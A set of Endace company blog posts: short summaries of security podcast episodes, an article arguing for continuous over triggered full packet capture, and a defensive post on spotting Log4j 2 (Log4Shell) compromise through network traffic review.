Endace Packet Forensics Files: Episode #33

Original Entry by : Michael Morris

Michael talks to NIST Fellow, Ron Ross

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

The dynamic nature and complexity of many organizations’ cyber infrastructure makes it hard enough to keep it running and performing, let alone to maintain the highest levels of security to protect your IP and data.  But do you know what the highest level of security standards are?

In this episode of the Endace Packet Forensic files I talk with NIST Fellow, Ron Ross, who shares how cyber security standards are evolving to keep pace with new threats and challenges. Ron highlights where he sees most organizations falling short and the highest priorities they should be addressing. He shares some insights into new standards and recommendations for protecting operational technologies which are becoming an attractive target for threat actors.

Finally, Ron talks about the need to move from a mindset of “prevention” to building “resiliency” into your security architecture to stay ahead of cyberthreats.

Other episodes in the Secure Networks video/audio podcast series are available here.


Triggered vs Continuous Capture

Original Entry by : Cary Wright

Can security teams afford to collect only a fraction of the evidence necessary to run down cyber attacks?

By Cary Wright, VP Product Management, Endace


Cary Wright, VP Product Management, EndaceSecurity teams rely on a variety of data sources for investigating security threats, including logs from network security, endpoint detection logs, logs from various servers and AAA devices in the network. But often these logs are not sufficient to determine the seriousness and extent of the threat – they may be missing information or may have been manipulated by an attacker. So many analysts turn to continuous Full Packet Capture (FPCAP) to fully analyse threat activity.

Continuous Full Packet Capture records every packet (regardless of rules) to disk in a large rotating buffer, ensuring that any and all threat traffic is recorded for later analysis. FPCAP will reveal all the various stages of an attack, including the initial exploit, command and control communications, surveillance and execute phases. FPCAP is very trustworthy because it cannot be manipulated by an attacker. And because all packets are being recorded we can be sure we have a record of all threat activity, whether that threat is detectable by security monitoring tools or not. Historically, it has been expensive to deploy enough FPCAP storage to get the recommended 30 days of look-back needed by security analysts. This is where triggered capture enters the story.

What is Triggered Packet Capture?

The concept of triggered packet capture is to capture only those packets related to detected or likely threats and discard the rest. The goal is to reduce the storage capacity needed to provide the necessary look-back period and thereby minimize the cost of storage.

One approach is to create rules or triggers to capture specific sequences or flows of packets and ignore anything that doesn’t match these rules. Recorded packets are stored in a unique packet capture (PCAP) file on a local file system or RAID array and at the same time an event notification may be logged to a SIEM or other security monitoring tools to ensure that PCAP can be found later.

Alternatively, the trigger rule might be a firewall signature or rule that causes a handful of packets to be recorded for that event to show what triggered the rule to fire. This is often an option provided by NGFWs but typically only very limited storage capacity is provided.

A second approach is to only capture those packets that your security monitoring tools don’t recognise as “normal” on the basis that this anomalous traffic could potentially indicate a threat or attack.

The Problems with Triggered Packet Capture

There are serious flaws with both the approaches above that will leave security teams lacking the PCAP evidence they need to properly investigate events.

Firstly, it’s really not possible to predict ahead of time what attacks you might be subject to. What about attacks that leverage the next Heartbleed SolarWinds or Log4J 2 type of vulnerability. How can you write triggers or rules that will ensure you reliably capture all the relevant packets related to future unknown threat vectors and vulnerabilities?  More than likely you will miss these attacks.

Secondly, capturing the packets relating to an initial trigger event such as an intrusion is useful, but it only tells part of the story. An initial exploit is just the beginning of an attack. You also need to capture downstream activity such as command and control communications, lateral movement, surveillance, exfiltration and other malicious activity. These will often be unique to each victim once the initial exploit has been successfully executed. And to investigate these conclusively you need access to full packet data. You can’t reconstruct exfiltrated data, or malware drops from metadata.

Lastly, attackers often try to camouflage their activity by using common protocols and traffic patterns to make their malicious activity look like normal user behavior. Capturing only “unknown” or “anomalous” traffic will most likely miss this activity.

These problems with triggered capture become very costly because your team have only part of the story, they must start guessing what might have happened and they must assume the worst case when reporting to customers, markets or affected parties. The lack of concrete evidence becomes very costly, just to save a few dollars on storage.

Only Full Packet Data provides a Complete Picture

During the incident response process, once an exploit has been detected analysts then need to look at any subsequent activity from the affected host or hosts – such as payload downloads, command-and-control (C2) communications, lateral movement to other hosts on the network, etc.

Only by examining full packet data can we really start to understand the full impact of a detected threat. If we only have triggered capture available and we don’t have any packets captured relating to activity after the initial exploit was detected, how can we tell whether there was a backdoor installed? Or tell what data was exfiltrated so we can understand what our legal obligations are to notify affected parties. These sort of questions cannot remain unanswered.

Advances in storage media, capture techniques and compression technology have made continuous full PCAP affordable now. So there’s no longer a need to compromise by deploying unreliable Triggered Capture to save a few bucks on disk storage. It’s simpler, faster, and much more robust to capture every packet so we are prepared to investigate any threat, new or old. Continuous full PCAP ensures teams can respond to incidents quickly and confidently, and in the long run this significantly reduces the cost of cybersecurity.


Endace Packet Forensics Files: Episode #32

Original Entry by : Michael Morris

Michael talks to Merritt Baer, Principal in the Office of the CISO at AWS

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Is your organization trying to implement enterprise level security at scale and you’re not sure where to focus?

In this episode of the Endace Packet Forensic files I talk with Merritt Baer, Principal in the Office of the CISO at AWS, who shares her experience in how to design and build robust, dynamic security at scale. Merritt discusses what security at scale looks like, some of the things that are often missed, and how to protect rapidly evolving hybrid cloud infrastructures.  She highlights some common pitfalls that organizations run into as they shift workloads to cloud providers and how to pivot your SOC teams and tools to ensure you have robust security forensics in place.

Finally, Merritt examines how adopting SOAR platforms can help, and things you can do to prevent gaps and breakdowns in your security posture.

Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Log4J 2 - how can you see if you've been attacked?Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat?  Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. This gives remote unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Network Unit 42, that discuss the risk, scale, and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, KeySight Technology, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found you need to isolate and investigate for any potential compromises. It’s essential to put in place policies, rules, and filter protections to monitor outbound egress of traffic to unknown IP addresses. Apply filters and pay extra attention to common traffic protocols like LDAP, LDAPS, RMI, DNS as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.

Of course, you should also ensure your IDS’s or firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata on a SIEM such as Splunk or Elastic, the first place to start looking would be to search all http transactions for strings including JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video of how to use Wireshark to identify and analyze a Log4j2 attack. Well worth watching:

Once you have identified connections that contain the JNDI string you can quickly examine any the subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading java malware to infect your server. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4J 2 and other zero-day attacks go to www.endace.com.


Endace Packet Forensics Files: Episode #31

Original Entry by : Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field against today’s threat actors. Whether it is adapting to simply keep up with the volume of threats or implementing AI and ML technologies to find and prevent more sophisticated threat vectors SecOps need to improve and upgrade.

In this episode of the Endace Packet Forensic files, I talk with seasoned SOC Director, Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between various industry verticals like governments, financial, energy and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #30

Original Entry by : Michael Morris

Michael talks to Tony Krzyzewski, Director of SAM for Compliance and Global Cyber Alliance Ambassador

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

In this episode of the Endace Packet Forensic files, I talk with Tony Krzyzewski, Director of SAM for Compliance, Global Cyber Alliance Ambassador, and New Zealand’s Convenor on the International Standards Organization SC27 Information Security, Cybersecurity and Privacy Protection Standards Committee.

With more than four decades working in IT and Networking, and almost three decades in cybersecurity, there are few more experienced practitioners than Tony. In this episode, Tony draws on his extensive experience to give some practical, pragmatic advice about where organizations need to focus to improve their cyber defenses. He highlights the importance of focusing on operational management processes for any cyber security program and reinforces the mantra I have been hearing from many CISOs about how the importance of regularly practising and performing “Security FireDrills”.

Tony talks about his long-time campaign to encourage organizations to adopt DMARC, “Domain-based Message Authentication, Reporting and Conformance” policies to improve protections against fraudulent email and phishing attacks.

Finally, Tony gives his perspective on the massive surge in SOAR and XDR solutions in the market and how that is impacting organizations’ security postures, and puts on his predictions hat as he talks about what to look out for in the year ahead.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensic files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts to accelerate investigation times and confirm or dispense potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #28

Original Entry by : Michael Morris

Michael talks to Tim Wade, Director, Office of the CTO, Vectra AI

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Security Operations teams at many organizations are reviewing processes and tools as breaches continue to happen, investigation times remain too long, outcomes are uncertain, and too many alerts are going unaddressed. Organizations are asking, “why are we spending so much money on security without tangible results?” They are looking at “SOC Modernization” initiatives to help them defend effectively against increasingly sophisticated threat actors.

In this episode of the Endace Packet Forensic files I talk with Tim Wade, Technical Director from the Office of the CTO at Vectra.AI, who shares his insights into the “SOC Modernization” trend and three pillars that he suggests require a change in thinking to ultimately be successful.

Tim starts with a fundamental change in philosophy – he suggests SOC teams need to shift from a “prevention” to a “resiliency” approach to cyberdefense. He illustrates the importance of taking incremental and iterative steps with monthly and even weekly measurement and review cycles to evaluate progress.

Tim suggests SOC teams need to better understand the rules of the game so they can step back and actively work to break them – because that is exactly what our treat actor adversaries are doing every day. Challenge everything and think like your opponent.

Finally, Tim advises CISOs that modernization needs to address challenges holistically. Not just focusing on technologies, but also ensuring they are working on people and processes and gaps in training, communication, and thinking.

Other episodes in the Secure Networks video/audio podcast series are available here.